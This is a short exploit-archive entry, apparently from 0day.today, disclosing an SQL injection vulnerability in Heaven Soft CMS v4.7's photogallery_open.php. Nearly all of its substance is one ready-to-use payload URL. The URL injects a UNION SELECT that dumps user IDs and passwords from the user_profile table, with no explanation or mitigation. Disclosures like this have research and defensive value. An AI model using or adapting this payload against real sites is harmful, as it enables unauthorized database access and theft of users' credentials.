id: 12244
date: 05/14/2010
title: Heaven Soft CMS v 4.7 photogallery_open.php SQL Injection Vulnerability
author: CoBRa_21
cves: 

=========================================================================
Heaven Soft CMS v 4.7 (photogallery_open.php) SQL Injection Vulnerability
=========================================================================

Author: CoBRa_21
  
Mail: uyku_cu@windowslive.com
  
Script Home: http://www.heavensoft.com.pk/
 
-------------------------------------------------------------------------------------------
  
Sql Injection:
  
http://localhost/[path]/photogallery_open.php?cid=-10%20union%20select%20group_concat%28user_id,0x3a,password%29+from+user_profile--
 
-------------------------------------------------------------------------------------------



#  0day.today [2023-03-24]  #